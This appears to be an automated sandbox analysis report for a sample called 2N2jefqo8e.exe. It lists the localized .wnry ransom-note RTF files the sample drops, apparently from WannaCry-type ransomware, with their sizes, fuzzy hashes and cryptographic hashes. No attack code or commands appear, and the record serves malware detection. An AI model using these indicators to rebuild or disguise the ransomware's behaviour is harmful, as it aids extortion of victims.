                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_danish.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):37045
                                Entropy (8bit):5.028683023706024
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHd02wG2roqni2Jeo75Y3kmA31dv61QyU:Shef3jHd4G2M5bZrS14Q
                                MD5:2C5A3B81D5C4715B7BEA01033367FCB5
                                SHA1:B548B45DA8463E17199DAAFD34C23591F94E82CD
                                SHA-256:A75BB44284B9DB8D702692F84909A7E23F21141866ADF3DB888042E9109A1CB6
                                SHA-512:490C5A892FAC801B853C348477B1140755D4C53CA05726AC19D3649AF4285C93523393A3667E209C71C80AC06FFD809F62DD69AE65012DCB00445D032F1277B3
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_dutch.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):36987
                                Entropy (8bit):5.036160205965849
                                Encrypted:false
                                SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdp2oG2/CzhReo75Y3kmA31dv61Qyz:Sw3BHSWjHdBG2/UhsZrS14f
                                MD5:7A8D499407C6A647C03C4471A67EAAD7
                                SHA1:D573B6AC8E7E04A05CBBD6B7F6A9842F371D343B
                                SHA-256:2C95BEF914DA6C50D7BDEDEC601E589FBB4FDA24C4863A7260F4F72BD025799C
                                SHA-512:608EF3FF0A517FE1E70FF41AEB277821565C5A9BEE5103AA5E45C68D4763FCE507C2A34D810F4CD242D163181F8341D9A69E93FE32ADED6FBC7F544C55743F12
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}

                                C:\Users\user\Desktop\msg\m_english.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):36973
                                Entropy (8bit):5.040611616416892
                                Encrypted:false
                                SSDEEP:384:S93BHSj2cguALeT+sPzy3EFHjHdM2EG2YLC7O3eo75Y3kmA31dv61QyW:S93BHSTjHd0G2YLCZrS14y
                                MD5:FE68C2DC0D2419B38F44D83F2FCF232E
                                SHA1:6C6E49949957215AA2F3DFB72207D249ADF36283
                                SHA-256:26FD072FDA6E12F8C2D3292086EF0390785EFA2C556E2A88BD4673102AF703E5
                                SHA-512:941FA0A1F6A5756ED54260994DB6158A7EBEB9E18B5C8CA2F6530C579BC4455918DF0B38C609F501CA466B3CC067B40E4B861AD6513373B483B36338AE20A810
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhim

                                C:\Users\user\Desktop\msg\m_filipino.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):37580
                                Entropy (8bit):5.0458193216786
                                Encrypted:false
                                SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdi2MG2AGsi6p07i/eo75Y3kmA31dv61QyR:Sw3BHSWjHdGG2Axa7iGZrS14N
                                MD5:08B9E69B57E4C9B966664F8E1C27AB09
                                SHA1:2DA1025BBBFB3CD308070765FC0893A48E5A85FA
                                SHA-256:D8489F8C16318E524B45DE8B35D7E2C3CD8ED4821C136F12F5EF3C9FC3321324
                                SHA-512:966B5ED68BE6B5CCD46E0DE1FA868CFE5432D9BF82E1E2F6EB99B2AEF3C92F88D96F4F4EEC5E16381B9C6DB80A68071E7124CA1474D664BDD77E1817EC600CB4
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}

                                C:\Users\user\Desktop\msg\m_finnish.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):38377
                                Entropy (8bit):5.030938473355282
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2oG2l1glOmeo75Y3kmA31dv61QyB:Shef3jHdMG2l1AO3ZrS14l
                                MD5:35C2F97EEA8819B1CAEBD23FEE732D8F
                                SHA1:E354D1CC43D6A39D9732ADEA5D3B0F57284255D2
                                SHA-256:1ADFEE058B98206CB4FBE1A46D3ED62A11E1DEE2C7FF521C1EEF7C706E6A700E
                                SHA-512:908149A6F5238FCCCD86F7C374986D486590A0991EF5243F0CD9E63CC8E208158A9A812665233B09C3A478233D30F21E3D355B94F36B83644795556F147345BF
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_french.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):38437
                                Entropy (8bit):5.031126676607223
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdtW2IG2sjqMeo75Y3kmA31dv61Qyg:Shef3jHd0G2smJZrS14M
                                MD5:4E57113A6BF6B88FDD32782A4A381274
                                SHA1:0FCCBC91F0F94453D91670C6794F71348711061D
                                SHA-256:9BD38110E6523547AED50617DDC77D0920D408FAEED2B7A21AB163FDA22177BC
                                SHA-512:4F1918A12269C654D44E9D394BC209EF0BC32242BE8833A2FBA437B879125177E149F56F2FB0C302330DEC328139B34982C04B3FEFB045612B6CC9F83EC85AA9
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_german.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):37181
                                Entropy (8bit):5.039739267952546
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdN26G2VSA1Ieo75Y3kmA31dv61QyU:Shef3jHdfG2oe1ZrS14w
                                MD5:3D59BBB5553FE03A89F817819540F469
                                SHA1:26781D4B06FF704800B463D0F1FCA3AFD923A9FE
                                SHA-256:2ADC900FAFA9938D85CE53CB793271F37AF40CF499BCC454F44975DB533F0B61
                                SHA-512:95719AE80589F71209BB3CB953276538040E7111B994D757B0A24283AEFE27AADBBE9EEF3F1F823CE4CABC1090946D4A2A558607AC6CAC6FACA5971529B34DAC
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_greek.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):49044
                                Entropy (8bit):4.910095634621579
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdc2oG2WWDFFG5BwKeo75Y3kmA31dv61QyM:Shef3jHdoG2NHG5BwLZrS14Q
                                MD5:FB4E8718FEA95BB7479727FDE80CB424
                                SHA1:1088C7653CBA385FE994E9AE34A6595898F20AEB
                                SHA-256:E13CC9B13AA5074DC45D50379ECEB17EE39A0C2531AB617D93800FE236758CA9
                                SHA-512:24DB377AF1569E4E2B2EBCCEC42564CEA95A30F1FF43BCAF25A692F99567E027BCEF4AACEF008EC5F64EA2EEF0C04BE88D2B30BCADABB3919B5F45A6633940CB
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_indonesian.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):37196
                                Entropy (8bit):5.039268541932758
                                Encrypted:false
                                SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdY2oG2pq32eo75Y3kmA31dv61Qys:Sw3BHSWjHdUG2pq3nZrS14I
                                MD5:3788F91C694DFC48E12417CE93356B0F
                                SHA1:EB3B87F7F654B604DAF3484DA9E02CA6C4EA98B7
                                SHA-256:23E5E738AAD10FB8EF89AA0285269AFF728070080158FD3E7792FE9ED47C51F4
                                SHA-512:B7DD9E6DC7C2D023FF958CAF132F0544C76FAE3B2D8E49753257676CC541735807B4BEFDF483BCAE94C2DCDE3C878C783B4A89DCA0FECBC78F5BBF7C356F35CD
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}

                                C:\Users\user\Desktop\msg\m_italian.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):36883
                                Entropy (8bit):5.028048191734335
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdR2AG2c/EnByeo75Y3kmA31dv61Qy9:Shef3jHdJG2cQZrS14R
                                MD5:30A200F78498990095B36F574B6E8690
                                SHA1:C4B1B3C087BD12B063E98BCA464CD05F3F7B7882
                                SHA-256:49F2C739E7D9745C0834DC817A71BF6676CCC24A4C28DCDDF8844093AAB3DF07
                                SHA-512:C0DA2AAE82C397F6943A0A7B838F60EEEF8F57192C5F498F2ECF05DB824CFEB6D6CA830BF3715DA7EE400AA8362BD64DC835298F3F0085AE7A744E6E6C690511
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_japanese.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):81844
                                Entropy (8bit):4.85025787009624
                                Encrypted:false
                                SSDEEP:384:SXZ0j2cKKwd1lksPzy3EFHjHdI2MG275rQeo75Y3kmA31dv61Qyr:SXZ0qbjHd4G2RNZrS14P
                                MD5:B77E1221F7ECD0B5D696CB66CDA1609E
                                SHA1:51EB7A254A33D05EDF188DED653005DC82DE8A46
                                SHA-256:7E491E7B48D6E34F916624C1CDA9F024E86FCBEC56ACDA35E27FA99D530D017E
                                SHA-512:F435FD67954787E6B87460DB026759410FBD25B2F6EA758118749C113A50192446861A114358443A129BE817020B50F21D27B1EBD3D22C7BE62082E8B45223FC
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}{\f12\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\*\falt Batang};}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f44\fbidi \froman\fcharset129\fprq2{\*\panose 020306000001

                                C:\Users\user\Desktop\msg\m_korean.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):91501
                                Entropy (8bit):4.841830504507431
                                Encrypted:false
                                SSDEEP:768:Shef3jHdUG2NQcbxfSVZiG9jvi3//ZVrMQr7pEKCHSI2DsY78piTDtTa6BxzBwdY:SheiaDq
                                MD5:6735CB43FE44832B061EEB3F5956B099
                                SHA1:D636DAF64D524F81367EA92FDAFA3726C909BEE1
                                SHA-256:552AA0F82F37C9601114974228D4FC54F7434FE3AE7A276EF1AE98A0F608F1D0
                                SHA-512:60272801909DBBA21578B22C49F6B0BA8CD0070F116476FF35B3AC8347B987790E4CC0334724244C4B13415A246E77A577230029E4561AE6F04A598C3F536C7E
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_latvian.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):41169
                                Entropy (8bit):5.030695296195755
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdcqH24G2ZN1EDCv3Apb0WD5gYV/S4L3rnzdeo75Y3f:Shef3jHdcMG2NpZrS14F
                                MD5:C33AFB4ECC04EE1BCC6975BEA49ABE40
                                SHA1:FBEA4F170507CDE02B839527EF50B7EC74B4821F
                                SHA-256:A0356696877F2D94D645AE2DF6CE6B370BD5C0D6DB3D36DEF44E714525DE0536
                                SHA-512:0D435F0836F61A5FF55B78C02FA47B191E5807A79D8A6E991F3115743DF2141B3DB42BA8BDAD9AD259E12F5800828E9E72D7C94A6A5259312A447D669B03EC44
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_norwegian.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):37577
                                Entropy (8bit):5.025836823617116
                                Encrypted:false
